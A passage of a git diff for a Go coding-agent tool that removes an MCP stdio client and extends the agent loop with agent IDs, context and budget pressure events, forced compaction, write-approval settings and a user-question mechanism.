-		"jsonrpc": "2.0",
-		"method":  method,
-	}
-	if params != nil {
-		msg["params"] = params
-	}
-	return c.writeMessage(msg)
-}
-
-func (c *mcpClient) writeMessage(msg any) error {
-	data, err := json.Marshal(msg)
-	if err != nil {
-		return err
-	}
-	c.wmu.Lock()
-	defer c.wmu.Unlock()
-	if _, err := c.stdin.Write(data); err != nil {
-		return err
-	}
-	_, err = c.stdin.Write([]byte("\n"))
-	return err
-}
-
-func (c *mcpClient) readLoop(r io.Reader) {
-	scanner := bufio.NewScanner(r)
-	scanner.Buffer(make([]byte, 0, 64*1024), 16*1024*1024)
-	for scanner.Scan() {
-		var msg rpcRequest
-		if err := json.Unmarshal(scanner.Bytes(), &msg); err != nil {
-			continue
-		}
-		if len(msg.ID) == 0 || len(msg.Method) > 0 {
-			continue
-		}
-		key := rawIDKey(msg.ID)
-		c.mu.Lock()
-		ch, ok := c.pending[key]
-		if ok {
-			delete(c.pending, key)
-		}
-		c.mu.Unlock()
-		if ok {
-			resp := mcpResponse{Result: msg.Result}
-			if len(msg.Error) > 0 {
-				var rpcErr rpcError
-				if err := json.Unmarshal(msg.Error, &rpcErr); err == nil {
-					resp.Error = &rpcErr
-				} else {
-					resp.Error = &rpcError{Code: -32000, Message: string(msg.Error)}
-				}
-			}
-			ch <- resp
-		}
-	}
-	c.closePending(fmt.Errorf("MCP server %q output closed", c.name))
-}
-
-func (c *mcpClient) removePending(key string) {
-	c.mu.Lock()
-	delete(c.pending, key)
-	c.mu.Unlock()
-}
-
-func (c *mcpClient) closePending(err error) {
-	c.mu.Lock()
-	pending := c.pending
-	c.pending = make(map[string]chan mcpResponse)
-	c.mu.Unlock()
-	for _, ch := range pending {
-		ch <- mcpResponse{Error: &rpcError{Code: -32000, Message: err.Error()}}
-	}
-}
-
-func (c *mcpClient) Close() {
-	if c.stdin != nil {
-		_ = c.stdin.Close()
-	}
-	if c.cmd != nil && c.cmd.Process != nil {
-		_ = c.cmd.Process.Kill()
-	}
-}
-
-func rawIDKey(id json.RawMessage) string {
-	return strings.Trim(string(id), "\"")
-}
-
-type mcpTool struct {
-	client *mcpClient
-	info   mcpToolInfo
-	name   string
-}
-
-func newMCPTool(client *mcpClient, info mcpToolInfo) tools.Tool {
-	return &mcpTool{
-		client: client,
-		info:   info,
-		name:   "mcp_" + sanitizeToolName(client.name) + "_" + sanitizeToolName(info.Name),
-	}
-}
-
-func (t *mcpTool) Name() string {
-	return t.name
-}
-
-func (t *mcpTool) Description() string {
-	if t.info.Description != "" {
-		return t.info.Description
-	}
-	return "Tool provided by MCP server " + t.client.name
-}
-
-func (t *mcpTool) PromptSnippet() string {
-	return fmt.Sprintf("%s: MCP tool %q from server %q", t.name, t.info.Name, t.client.name)
-}
-
-func (t *mcpTool) PromptGuidelines() []string {
-	return nil
-}
-
-func (t *mcpTool) Parameters() json.RawMessage {
-	if len(t.info.InputSchema) == 0 {
-		return json.RawMessage(`{"type":"object"}`)
-	}
-	return t.info.InputSchema
-}
-
-func (t *mcpTool) Execute(ctx context.Context, params map[string]any) (tools.ToolResult, error) {
-	result, err := t.client.callTool(ctx, t.info.Name, params)
-	text := mcpContentToText(result.Content)
-	if text == "" && err != nil {
-		text = err.Error()
-	}
-	return tools.NewTextToolResult(text), err
-}
-
-func sanitizeToolName(name string) string {
-	var b strings.Builder
-	for _, r := range name {
-		switch {
-		case r >= 'a' && r <= 'z':
-			b.WriteRune(r)
-		case r >= 'A' && r <= 'Z':
-			b.WriteRune(r)
-		case r >= '0' && r <= '9':
-			b.WriteRune(r)
-		default:
-			b.WriteByte('_')
-		}
-	}
-	out := strings.Trim(b.String(), "_")
-	if out == "" {
-		return "tool"
-	}
-	return out
-}
-
-func mcpContentToText(blocks []mcpContentBlock) string {
-	var parts []string
-	for _, block := range blocks {
-		switch block.Type {
-		case "text":
-			if block.Text != "" {
-				parts = append(parts, block.Text)
-			}
-		case "image", "audio":
-			parts = append(parts, fmt.Sprintf("[%s content: %s]", block.Type, block.MimeType))
-		default:
-			data, _ := json.Marshal(block)
-			if len(data) > 0 {
-				parts = append(parts, string(data))
-			}
-		}
-	}
-	return strings.Join(parts, "\n")
-}
diff --git a/internal/agent/agent.go b/internal/agent/agent.go
index 1e4ab28..f295a76 100644
--- a/internal/agent/agent.go
+++ b/internal/agent/agent.go
@@ -6,8 +6,10 @@ import (
 	"fmt"
 	"strings"
 	"sync"
+	"sync/atomic"
 	"time"
 
+	agentpkg "github.com/startvibecoding/vibecoding/agent"
 	"github.com/startvibecoding/vibecoding/internal/config"
 	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
 	"github.com/startvibecoding/vibecoding/internal/provider"
@@ -16,8 +18,55 @@ import (
 	"github.com/startvibecoding/vibecoding/internal/tools"
 )
 
+// contextKey is an unexported type for context keys defined in this package.
+type contextKey int
+
+const (
+	// agentIDKey is the context key for the current agent's ID.
+	agentIDKey contextKey = iota
+	// agentEventChanKey is the context key for the current agent's event channel.
+	agentEventChanKey
+	// parentRunContextKey carries the parent agent run context through tool timeouts.
+	parentRunContextKey
+)
+
+// ContextWithAgentID returns a new context with the agent ID attached.
+func ContextWithAgentID(ctx context.Context, id agentpkg.AgentID) context.Context {
+	return context.WithValue(ctx, agentIDKey, id)
+}
+
+// AgentIDFromContext extracts the agent ID from the context.
+func AgentIDFromContext(ctx context.Context) (agentpkg.AgentID, bool) {
+	id, ok := ctx.Value(agentIDKey).(agentpkg.AgentID)
+	return id, ok
+}
+
+// ContextWithEventChan returns a new context with the event channel attached.
+func ContextWithEventChan(ctx context.Context, ch chan<- Event) context.Context {
+	return context.WithValue(ctx, agentEventChanKey, ch)
+}
+
+// EventChanFromContext extracts the event channel from the context.
+func EventChanFromContext(ctx context.Context) (chan<- Event, bool) {
+	ch, ok := ctx.Value(agentEventChanKey).(chan<- Event)
+	return ch, ok
+}
+
+// ContextWithParentRunContext attaches the parent agent run context to a tool context.
+func ContextWithParentRunContext(ctx context.Context, parent context.Context) context.Context {
+	return context.WithValue(ctx, parentRunContextKey, parent)
+}
+
+// ParentRunContextFromContext extracts the parent agent run context.
+func ParentRunContextFromContext(ctx context.Context) (context.Context, bool) {
+	parent, ok := ctx.Value(parentRunContextKey).(context.Context)
+	return parent, ok
+}
+
 // Config holds the agent configuration.
 type Config struct {
+	ID                 agentpkg.AgentID
+	ParentID           agentpkg.AgentID
 	Provider           provider.Provider
 	Model              *provider.Model
 	Mode               string // "plan", "agent", "yolo"
@@ -29,6 +78,7 @@ type Config struct {
 	ExtraContext       string // extra context from files and skills
 	CompactionSettings ctxpkg.CompactionSettings
 	ApprovalHandler    func(toolCallID, toolName string, args map[string]any) bool
+	MultiAgent         bool // Decision 8: multi-agent mode
 }
 
 // AgentLoopConfig extends Config with loop-specific settings.
@@ -60,6 +110,18 @@ type AgentLoopConfig struct {
 
 	// AfterToolCall is called after a tool finishes executing.
 	AfterToolCall func(ctx AfterToolCallContext) *ToolCallResult
+
+	// ContextPressureThreshold is the context usage percentage (0-1) that triggers EventContextPressure.
+	// 0 means disabled. Default: 0.55 (55%).
+	ContextPressureThreshold float64
+
+	// BudgetPressureThreshold is the remaining iteration ratio (0-1) that triggers EventBudgetPressure.
+	// 0 means disabled. Default: 0.20 (remaining 20%).
+	BudgetPressureThreshold float64
+
+	// MaxConsecutiveNoText is the max tool-only turns before a stuck-detection warning.
+	// 0 means default (95).
+	MaxConsecutiveNoText int
 }
 
 // ShouldStopAfterTurnContext is passed to ShouldStopAfterTurn.
@@ -120,8 +182,65 @@ type AgentContext struct {
 	Tools        []provider.ToolDefinition
 }
 
+func cloneAgentContext(ctx *AgentContext) *AgentContext {
+	if ctx == nil {
+		return nil
+	}
+	return &AgentContext{
+		SystemPrompt: ctx.SystemPrompt,
+		Messages:     cloneMessages(ctx.Messages),
+		Tools:        append([]provider.ToolDefinition(nil), ctx.Tools...),
+	}
+}
+
+func cloneMessages(messages []provider.Message) []provider.Message {
+	if len(messages) == 0 {
+		return nil
+	}
+	cloned := make([]provider.Message, len(messages))
+	for i, msg := range messages {
+		cloned[i] = cloneMessage(msg)
+	}
+	return cloned
+}
+
+func cloneMessage(msg provider.Message) provider.Message {
+	cloned := msg
+	if len(msg.Contents) > 0 {
+		cloned.Contents = make([]provider.ContentBlock, len(msg.Contents))
+		for i, block := range msg.Contents {
+			cloned.Contents[i] = cloneContentBlock(block)
+		}
+	}
+	if msg.Usage != nil {
+		usage := *msg.Usage
+		cloned.Usage = &usage
+	}
+	return cloned
+}
+
+func cloneContentBlock(block provider.ContentBlock) provider.ContentBlock {
+	cloned := block
+	if block.Image != nil {
+		image := *block.Image
+		cloned.Image = &image
+	}
+	if block.ToolCall != nil {
+		toolCall := *block.ToolCall
+		toolCall.Arguments = append([]byte(nil), block.ToolCall.Arguments...)
+		cloned.ToolCall = &toolCall
+	}
+	if block.CacheControl != nil {
+		cacheControl := *block.CacheControl
+		cloned.CacheControl = &cacheControl
+	}
+	return cloned
+}
+
 // Agent is the core agent loop.
 type Agent struct {
+	id          agentpkg.AgentID
+	parentID    agentpkg.AgentID
 	config      AgentLoopConfig
 	registry    *tools.Registry
 	mu          sync.RWMutex
@@ -141,14 +260,31 @@ type Agent struct {
 	pendingApprovals map[string]chan bool // approvalID -> response channel
 	approvalMu       sync.Mutex
 	approvalCounter  int64
+
+	// Question mechanism for plan mode
+	pendingQuestions map[string]chan string // questionID -> response channel
+	questionMu       sync.Mutex
+	questionCounter  int64
+
+	// Force compaction flag — set by /compact command, consumed by ShouldCompact
+	forceCompact int32 // atomic: 0=false, 1=true
 }
 
 // buildFrozenPrompt builds the system prompt and tools once at construction time.
 // These values are frozen for the entire session lifetime to maximize prompt cache hits.
 // This implements Rule R2.1 from LLM_Agent_Cache.md: System prompt must be built once and never modified.
 func (a *Agent) buildFrozenPrompt() {
-	toolNames := make([]string, 0)
-	for _, t := range a.registry.ModeTools(a.config.Mode) {
+	toolDefs := a.registry.ModeTools(a.config.Mode)
+	if a.config.Settings != nil {
+		if t, ok := webSearchToolDefinition(a.config.Settings); ok {
+			toolDefs = append(toolDefs, t)
+		}
+	}
+	toolNames := make([]string, 0, len(toolDefs))
+	for _, t := range toolDefs {
+		if t.Kind == "hosted" {
+			continue
+		}
 		toolNames = append(toolNames, t.Name)
 	}
 	toolSnippets := a.registry.ToolSnippets(toolNames)
@@ -160,11 +296,92 @@ func (a *Agent) buildFrozenPrompt() {
 		a.config.ExtraContext,
 		toolSnippets,
 		toolGuidelines,
+		a.config.MultiAgent,
 	)
-	a.frozenToolDefs = a.registry.ModeTools(a.config.Mode)
+	a.frozenToolDefs = toolDefs
 	a.frozenToolNames = toolNames
 }
 
+func webSearchToolDefinition(settings *config.Settings) (provider.ToolDefinition, bool) {
+	if settings == nil || !settings.IsWebSearchEnabled() {
+		return provider.ToolDefinition{}, false
+	}
+	cfg := settings.WebSearch
+	providerName := cfg.Provider
+	if providerName == "" {
+		providerName = settings.DefaultProvider
+	}
+	if providerName == "" {
+		providerName = "openai"
+	}
+
+	resolved := provider.AdapterConfig{}
+	if pc := settings.GetProviderConfig(providerName); pc != nil {
+		resolved = provider.ResolveAdapterConfig(pc)
+	} else {
+		resolved = provider.ResolveAdapterConfig(&config.ProviderConfig{API: "openai-chat"})
+		switch providerName {
+		case "anthropic":
+			resolved.API = "anthropic-messages"
+		case "openai":
+			resolved.API = "openai-responses"
+		}
+	}
+
+	providerType := cfg.ProviderType
+	if providerType == "" {
+		switch resolved.API {
+		case "anthropic-messages":
+			providerType = "messages"
+		default:
+			providerType = "responses"
+		}
+	}
+
+	return provider.ToolDefinition{
+		Name:         "web_search",
+		Kind:         "hosted",
+		Provider:     providerName,
+		ProviderType: providerType,
+		Model:        cfg.Model,
+	}, true
+}
+
+// supportsImages checks if the model supports image input.
+func (a *Agent) supportsImages() bool {
+	if a.config.Model == nil {
+		return false
+	}
+	for _, input := range a.config.Model.Input {
+		if input == "image" {
+			return true
+		}
+	}
+	return false
+}
+
+// stripImageContent removes image content blocks from messages.
+// This prevents 404 errors when sending to models that don't support image input.
+func stripImageContent(messages []provider.Message) []provider.Message {
+	result := make([]provider.Message, 0, len(messages))
+	for _, msg := range messages {
+		if len(msg.Contents) > 0 {
+			var filtered []provider.ContentBlock
+			for _, c := range msg.Contents {
+				if c.Type != "image" {
+					filtered = append(filtered, c)
+				}
+			}
+			if len(filtered) == 0 && msg.Content == "" {
+				continue // skip message with only image content and no text
+			}
+			msg.Contents = filtered
+		}
+		result = append(result, msg)
+	}
+	return result
+}
+
 // buildSessionContextMessage builds the [session context] message with dynamic information.
 // This implements Rule R2.3 from LLM_Agent_Cache.md: dynamic info goes into a separate message.
 // The message is marked as SystemInjected so cache markers skip it.
@@ -282,17 +499,27 @@ func New(cfg Config, registry *tools.Registry) *Agent {
 		MaxIterations:     200,
 	}
 
+	id := cfg.ID
+	if id == "" {
+		id = agentpkg.AgentID(fmt.Sprintf("agent-%d", time.Now().UnixNano()))
+	}
+
 	agent := &Agent{
+		id:               id,
+		parentID:         cfg.ParentID,
 		config:           loopConfig,
 		registry:         registry,
 		abort:            make(chan struct{}),
 		pendingApprovals: make(map[string]chan bool),
+		pendingQuestions:  make(map[string]chan string),
 		context: &AgentContext{
 			Messages: make([]provider.Message, 0),
 		},
 	}
 	// Build frozen system prompt once at construction time (R2.1)
 	agent.buildFrozenPrompt()
+	agent.context.SystemPrompt = agent.frozenSystemPrompt
+	agent.context.Tools = agent.frozenToolDefs
 	return agent
 }
 
@@ -305,17 +532,27 @@ func NewWithLoopConfig(cfg AgentLoopConfig, registry *tools.Registry) *Agent {
 		cfg.ToolExecutionMode = "parallel"
 	}
 
+	id := cfg.ID
+	if id == "" {
+		id = agentpkg.AgentID(fmt.Sprintf("agent-%d", time.Now().UnixNano()))
+	}
+
 	agent := &Agent{
+		id:               id,
+		parentID:         cfg.ParentID,
 		config:           cfg,
 		registry:         registry,
 		abort:            make(chan struct{}),
 		pendingApprovals: make(map[string]chan bool),
+		pendingQuestions:  make(map[string]chan string),
 		context: &AgentContext{
 			Messages: make([]provider.Message, 0),
 		},
 	}
 	// Build frozen system prompt once at construction time (R2.1)
 	agent.buildFrozenPrompt()
+	agent.context.SystemPrompt = agent.frozenSystemPrompt
+	agent.context.Tools = agent.frozenToolDefs
 	return agent
 }
 
@@ -328,12 +565,33 @@ func (a *Agent) LoadHistoryMessages(messages []provider.Message) {
 }
 
 // Abort signals the agent to stop processing.
+// Satisfies both internal and public agent.Agent interface.
 func (a *Agent) Abort() {
 	a.abortOnce.Do(func() {
 		close(a.abort)
 	})
 }
 
+func (a *Agent) callbackSnapshot() ([]provider.Message, *AgentContext) {
+	a.mu.RLock()
+	defer a.mu.RUnlock()
+	return cloneMessages(a.messages), cloneAgentContext(a.context)
+}
+
+// emit sends an event with this agent's ID stamped on it.
+func (a *Agent) emit(ch chan<- Event, event Event) {
+	event.AgentID = a.id
+	ch <- event
+}
+
+// --- Public agent.Agent interface methods ---
+
+// ID returns the agent's unique identifier.
+func (a *Agent) ID() agentpkg.AgentID { return a.id }
+
+// ParentID returns the parent agent's ID, or empty if top-level.
+func (a *Agent) ParentID() agentpkg.AgentID { return a.parentID }
+
 // Run processes a user message and streams events back.
 func (a *Agent) Run(ctx context.Context, userMsg string) <-chan Event {
 	ch := make(chan Event, 100)
@@ -343,12 +601,17 @@ func (a *Agent) Run(ctx context.Context, userMsg string) <-chan Event {
 
 		// Add user message to conversation
 		msg := provider.NewUserMessage(userMsg)
+		a.mu.Lock()
 		a.messages = append(a.messages, msg)
 		a.context.Messages = append(a.context.Messages, msg)
+		a.mu.Unlock()
 
 		// Save to session
 		if a.config.Session != nil {
-			a.config.Session.AppendMessage(msg)
+			if _, err := a.config.Session.AppendMessage(msg); err != nil {
+				ch <- Event{Type: EventError, Error: fmt.Errorf("save user message to session: %w", err)}
+				return
+			}
 		}
 
 		// Run agent loop
@@ -380,10 +643,17 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 
 	// Track consecutive iterations without text output for loop detection
 	consecutiveNoText := 0
-	const maxConsecutiveNoText = 95            // Threshold to trigger stuck detection
+	maxConsecutiveNoText := a.config.MaxConsecutiveNoText
+	if maxConsecutiveNoText <= 0 {
+		maxConsecutiveNoText = 95 // default threshold
+	}
 	const maxConsecutiveNoTextAfterWarning = 5 // After warning, allow 5 more turns before stopping
 	warningIssued := false
 
+	// Pressure tracking — fire events once per threshold crossing
+	contextPressureFired := false
+	budgetPressureFired := false
+
 	for i := 0; i < a.config.MaxIterations; i++ {
 		select {
 		case <-ctx.Done():
@@ -404,11 +674,15 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 		// Process pending steering messages
 		if a.config.GetSteeringMessages != nil {
 			steeringMessages := a.config.GetSteeringMessages()
-			for _, msg := range steeringMessages {
-				ch <- Event{Type: EventMessageStart, Message: msg}
-				ch <- Event{Type: EventMessageEnd, Message: msg}
-				a.messages = append(a.messages, msg)
-				a.context.Messages = append(a.context.Messages, msg)
+			if len(steeringMessages) > 0 {
+				a.mu.Lock()
+				for _, msg := range steeringMessages {
+					ch <- Event{Type: EventMessageStart, Message: msg}
+					ch <- Event{Type: EventMessageEnd, Message: msg}
+					a.messages = append(a.messages, msg)
+					a.context.Messages = append(a.context.Messages, msg)
+				}
+				a.mu.Unlock()
 			}
 		}
 
@@ -427,6 +701,11 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 		allMessages = append(allMessages, a.messages...)
 		a.mu.RUnlock()
 
+		// Strip image content if model doesn't support it
+		if !a.supportsImages() {
+			allMessages = stripImageContent(allMessages)
+		}
+
 		// Select cache markers (dual-marker rolling buffer, R3.1-R3.3)
 		markers := selectCacheMarkers(allMessages)
 		messagesWithMarkers := applyCacheMarkers(allMessages, markers)
@@ -438,6 +717,8 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 			SystemPrompt:  a.frozenSystemPrompt,
 			ThinkingLevel: a.config.ThinkingLevel,
 			MaxTokens:     a.config.MaxTokens,
+			Temperature:   a.config.Model.Temperature,
+			TopP:          a.config.Model.TopP,
 			Abort:         a.abort,
 		}
 
@@ -490,6 +771,10 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 			case provider.StreamError:
 				streamErr = event.Error
 				stopReason = event.StopReason
+			case provider.StreamRetry:
+				if event.Error != nil {
+					ch <- Event{Type: EventStatus, StatusMessage: event.Error.Error()}
+				}
 			}
 		}
 
@@ -540,7 +825,10 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 
 		// Save to session
 		if a.config.Session != nil {
-			a.config.Session.AppendMessage(assistantMsg)
+			if _, err := a.config.Session.AppendMessage(assistantMsg); err != nil {
+				ch <- Event{Type: EventError, Error: fmt.Errorf("save assistant message to session: %w", err)}
+				return
+			}
 		}
 
 		// Calculate cost
@@ -548,39 +836,9 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 			usage.CalculateCost(a.config.Model)
 		}
 
-		// Track progress for loop detection
-		if textContent == "" {
-			consecutiveNoText++
-			threshold := maxConsecutiveNoText
-			if warningIssued {
-				threshold = maxConsecutiveNoTextAfterWarning
-			}
-			if consecutiveNoText >= threshold {
-				if !warningIssued {
-					// Inject a warning message to let the AI explain itself
-					warningMsg := provider.NewUserMessage("[System] You have been making tool calls for " + fmt.Sprintf("%d", consecutiveNoText) + " consecutive turns without any text response. Please explain what you are doing and whether you are stuck. If you are making progress, briefly describe your current task and continue. If you are truly stuck, please stop and explain the issue.")
-					ch <- Event{Type: EventMessageStart, Message: warningMsg}
-					ch <- Event{Type: EventMessageEnd, Message: warningMsg}
-					a.mu.Lock()
-					a.messages = append(a.messages, warningMsg)
-					a.context.Messages = append(a.context.Messages, warningMsg)
-					a.mu.Unlock()
-					warningIssued = true
-					consecutiveNoText = 0 // Reset counter for post-warning phase
-				} else {
-					// Already warned, now truly stuck
-					ch <- Event{Type: EventError, Error: fmt.Errorf("agent appears stuck: %d consecutive turns without text output after warning", consecutiveNoText+maxConsecutiveNoText), StopReason: "stuck"}
-					ch <- Event{Type: EventAgentEnd, Messages: func() []provider.Message {
-						a.mu.RLock()
-						defer a.mu.RUnlock()
-						m := make([]provider.Message, len(a.messages))
-						copy(m, a.messages)
-						return m
-					}()}
-					return
-				}
-			}
-		} else {
+		// Track progress for loop detection. Tool-only warnings are injected
+		// after tool results are recorded so provider message ordering stays valid.
+		if textContent != "" {
 			consecutiveNoText = 0
 			warningIssued = false // AI responded with text, reset warning state
 		}
@@ -617,12 +875,104 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 		a.mu.Unlock()
 		for _, result := range toolResults {
 			if a.config.Session != nil {
-				a.config.Session.AppendMessage(result)
+				if _, err := a.config.Session.AppendMessage(result); err != nil {
+					ch <- Event{Type: EventError, Error: fmt.Errorf("save tool result to session: %w", err)}
+					return
+				}
+			}
+		}
+
+		if textContent == "" {
+			consecutiveNoText++
+			threshold := maxConsecutiveNoText
+			if warningIssued {
+				threshold = maxConsecutiveNoTextAfterWarning
+			}
+			if consecutiveNoText >= threshold {
+				if !warningIssued {
+					// Inject a warning message to let the AI explain itself.
+					warningMsg := provider.NewUserMessage("[System] You have been making tool calls for " + fmt.Sprintf("%d", consecutiveNoText) + " consecutive turns without any text response. Please explain what you are doing and whether you are stuck. If you are making progress, briefly describe your current task and continue. If you are truly stuck, please stop and explain the issue.")
+					ch <- Event{Type: EventMessageStart, Message: warningMsg}
+					ch <- Event{Type: EventMessageEnd, Message: warningMsg}
+					a.mu.Lock()
+					a.messages = append(a.messages, warningMsg)
+					a.context.Messages = append(a.context.Messages, warningMsg)
+					a.mu.Unlock()
+					if a.config.Session != nil {
+						if _, err := a.config.Session.AppendMessage(warningMsg); err != nil {
+							ch <- Event{Type: EventError, Error: fmt.Errorf("save warning message to session: %w", err)}
+							return
+						}
+					}
+					warningIssued = true
+					consecutiveNoText = 0 // Reset counter for post-warning phase
+				} else {
+					// Already warned, now truly stuck. Tool results have already been
+					// appended, so the saved transcript remains provider-valid.
+					ch <- Event{Type: EventError, Error: fmt.Errorf("agent appears stuck: %d consecutive turns without text output after warning", consecutiveNoText), StopReason: "stuck"}
+					ch <- Event{Type: EventAgentEnd, Messages: func() []provider.Message {
+						a.mu.RLock()
+						defer a.mu.RUnlock()
+						m := make([]provider.Message, len(a.messages))
+						copy(m, a.messages)
+						return m
+					}()}
+					return
+				}
 			}
 		}
 
 		ch <- Event{Type: EventTurnEnd, TurnMessage: assistantMsg, TurnToolResults: toolResults, ContextUsage: a.GetContextUsage()}
 
+		// --- Pressure checks (fire once per threshold crossing) ---
+
+		// Context Pressure: fire EventContextPressure once when usage exceeds threshold
+		if !contextPressureFired {
+			threshold := a.config.ContextPressureThreshold
+			if threshold <= 0 {
+				threshold = 0.55 // default 55%
+			}
+			if ctx := a.GetContextUsage(); ctx != nil && ctx.Percent != nil {
+				if *ctx.Percent >= threshold {
+					contextPressureFired = true
+					warnMsg := fmt.Sprintf(
+						"[Context Pressure] %.0f%% of context window used (%d/%d tokens). "+
+							"Compaction will trigger soon. Consider saving important context to memory.md and wrapping up the current task.",
+						*ctx.Percent, ctx.Tokens, ctx.ContextWindow)
+					ch <- Event{
+						Type:            EventContextPressure,
+						PressureMessage: warnMsg,
+						PressureType:    "context",
+						PressurePercent: *ctx.Percent,
+						ContextUsage:    ctx,
+					}
+				}
+			}
+		}
+
+		// Budget Pressure: fire EventBudgetPressure once when remaining iterations reach threshold
+		if !budgetPressureFired {
+			threshold := a.config.BudgetPressureThreshold
+			if threshold <= 0 {
+				threshold = 0.20 // default 20%
+			}
+			remaining := float64(a.config.MaxIterations-i) / float64(a.config.MaxIterations)
+			if remaining <= threshold {
+				budgetPressureFired = true
+				remainingTurns := a.config.MaxIterations - i
+				warnMsg := fmt.Sprintf(
+					"[Budget Pressure] %d/%d turns remaining (%.0f%%). "+
+						"Complete the current task and summarize progress.",
+					remainingTurns, a.config.MaxIterations, remaining*100)
+				ch <- Event{
+					Type:            EventBudgetPressure,
+					PressureMessage: warnMsg,
+					PressureType:    "budget",
+					PressurePercent: remaining * 100,
+				}
+			}
+		}
+
 		// Check if compaction should trigger
 		if a.ShouldCompact() {
 			if err := a.Compact(ctx, ch); err != nil {
@@ -633,11 +983,12 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 
 		// Check if we should stop after this turn
 		if a.config.ShouldStopAfterTurn != nil {
+			messagesSnapshot, contextSnapshot := a.callbackSnapshot()
 			stopCtx := ShouldStopAfterTurnContext{
 				Message:     assistantMsg,
-				ToolResults: toolResults,
-				Context:     a.context,
-				NewMessages: a.messages,
+				ToolResults: cloneMessages(toolResults),
+				Context:     contextSnapshot,
+				NewMessages: messagesSnapshot,
 			}
 			if a.config.ShouldStopAfterTurn(stopCtx) {
 				ch <- Event{Type: EventDone, StopReason: "should_stop"}
@@ -654,12 +1005,13 @@ func (a *Agent) loop(ctx context.Context, ch chan<- Event) {
 
 		// Prepare next turn
 		if a.config.PrepareNextTurn != nil {
+			messagesSnapshot, contextSnapshot := a.callbackSnapshot()
 			prepCtx := PrepareNextTurnContext{
 				ShouldStopAfterTurnContext: ShouldStopAfterTurnContext{
 					Message:     assistantMsg,
-					ToolResults: toolResults,
-					Context:     a.context,
-					NewMessages: a.messages,
+					ToolResults: cloneMessages(toolResults),
+					Context:     contextSnapshot,
+					NewMessages: messagesSnapshot,
 				},
 			}
 			update := a.config.PrepareNextTurn(prepCtx)
@@ -840,13 +1192,23 @@ func (a *Agent) executeSingleToolCall(ctx context.Context, tc provider.ToolCallB
 	toolCtx, cancel := context.WithTimeout(ctx, 5*time.Minute)
 	defer cancel()
 
+	// Inject agent ID and event channel into context for sub-agent tools
+	toolCtx = ContextWithAgentID(toolCtx, a.id)
+	toolCtx = ContextWithEventChan(toolCtx, ch)
+	toolCtx = ContextWithParentRunContext(toolCtx, ctx)
+	toolCtx = tools.ContextWithQuestionAsker(toolCtx, a)
+
 	result, err := tool.Execute(toolCtx, params)
 	isError := err != nil
 	resultContent := result.Text
 	resultContents := result.Contents
+	resultDiff := result.Diff
+	resultPlan := result.Plan
 	if err != nil {
 		resultContent = err.Error()
 		resultContents = nil
+		resultDiff = nil
+		resultPlan = nil
 	}
 
 	// Apply after-tool-call hook
@@ -867,6 +1229,16 @@ func (a *Agent) executeSingleToolCall(ctx context.Context, tc provider.ToolCallB
 			}
 			isError = afterResult.IsError
 			resultContents = nil
+			resultPlan = nil
+		}
+	}
+
+	if resultPlan != nil {
+		ch <- Event{
+			Type:       EventPlanUpdate,
+			ToolCallID: tc.ID,
+			ToolName:   tc.Name,
+			Plan:       resultPlan,
 		}
 	}
 
@@ -875,6 +1247,7 @@ func (a *Agent) executeSingleToolCall(ctx context.Context, tc provider.ToolCallB
 		ToolCallID: tc.ID,
 		ToolName:   tc.Name,
 		ToolResult: resultContent,
+		ToolDiff:   resultDiff,
 		ToolError:  err,
 	}
 	ch <- Event{
@@ -882,6 +1255,7 @@ func (a *Agent) executeSingleToolCall(ctx context.Context, tc provider.ToolCallB
 		ToolCallID: tc.ID,
 		ToolName:   tc.Name,
 		ToolResult: resultContent,
+		ToolDiff:   resultDiff,
 		ToolError:  err,
 	}
 
@@ -949,8 +1323,27 @@ func (a *Agent) GetContextUsage() *ctxpkg.ContextUsage {
 	}
 }
 
+// SetForceCompact marks the agent for forced compaction on the next turn.
+// Called by /compact command in TUI and Gateway.
+func (a *Agent) SetForceCompact() {
+	atomic.StoreInt32(&a.forceCompact, 1)
+}
+
 // ShouldCompact checks if compaction should trigger.
+// Returns true if context exceeds the threshold OR if forced via SetForceCompact.
 func (a *Agent) ShouldCompact() bool {
+	// Check force flag first (consumes it)
+	if atomic.CompareAndSwapInt32(&a.forceCompact, 1, 0) {
+		// Force compaction requested — still need a model and some messages
+		a.mu.RLock()
+		hasModel := a.config.Model != nil
+		hasMsgs := len(a.messages) >= 2
+		a.mu.RUnlock()
+		if hasModel && hasMsgs {
+			return true
+		}
+	}
+
 	a.mu.RLock()
 	defer a.mu.RUnlock()
 	if !a.config.CompactionSettings.Enabled {
@@ -1010,7 +1403,10 @@ func (a *Agent) Compact(ctx context.Context, ch chan<- Event) error {
 
 	// Save compaction to session
 	if a.config.Session != nil {
-		a.config.Session.AppendCompaction(result.Summary, "", result.TokensBefore)
+		if _, err := a.config.Session.AppendCompaction(result.Summary, "", result.TokensBefore); err != nil {
+			ch <- Event{Type: EventCompactionEnd, Error: fmt.Errorf("save compaction to session: %w", err)}
+			return fmt.Errorf("save compaction to session: %w", err)
+		}
 	}
 
 	ch <- Event{
@@ -1029,6 +1425,11 @@ func (a *Agent) Compact(ctx context.Context, ch chan<- Event) error {
 
 // NeedsApproval checks if a tool call needs user approval based on the current mode.
 func (a *Agent) NeedsApproval(toolName string, args map[string]any) bool {
+	if (toolName == "write" || toolName == "edit") && a.config.Mode == "agent" {
+		return a.config.Settings != nil &&
+			a.config.Settings.Approval.ConfirmBeforeWrite != nil &&
+			*a.config.Settings.Approval.ConfirmBeforeWrite
+	}
 	if toolName != "bash" {
 		return false
 	}
@@ -1121,3 +1522,52 @@ func (a *Agent) HandleApprovalResponse(approvalID string, approved bool) {
 		delete(a.pendingApprovals, approvalID)
 	}
 }
+
+// RequestQuestion sends a question request and waits for the user's answer.
+func (a *Agent) RequestQuestion(ch chan<- Event, question string, options []string, context string) string {
+	a.questionMu.Lock()
+	a.questionCounter++
+	questionID := fmt.Sprintf("question-%d", a.questionCounter)
+	responseCh := make(chan string, 1)
+	a.pendingQuestions[questionID] = responseCh
+	a.questionMu.Unlock()
+
+	ch <- Event{
+		Type:            EventQuestionRequest,
+		QuestionID:      questionID,
